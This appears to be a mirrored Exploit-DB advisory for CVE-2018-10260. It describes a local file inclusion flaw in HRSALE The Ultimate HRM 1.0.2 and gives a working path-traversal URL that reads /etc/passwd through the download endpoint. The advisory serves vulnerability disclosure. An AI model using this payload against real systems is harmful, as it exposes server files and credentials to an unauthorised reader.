HRSALE The Ultimate HRM 1.0.2 – Local File Inclusion

  • 作者: 8bitsec
    日期: 2018-04-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44539/
  • # Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion
    # Date: 2018-04-23
    # Exploit Author: 8bitsec
    # CVE: CVE-2018-10260
    # Vendor Homepage: https://codecanyon.net/
    # Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
    # Version: 1.0.2
    # Tested on: [Kali Linux 2.0 | Mac OS 10.13]
    
    Release Date:
    =============
    2018-04-23
    
    Product & Service Introduction:
    ===============================
    HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
    
    Technical Details & Description:
    ================================
    
    Local File Inclusion vulnerability found logged as low privileged user.
    
    Proof of Concept (PoC):
    =======================
    
    LFI:
    
    http://localhost/[path]/admin/download?type=task&filename=../../../../../../../../etc/passwd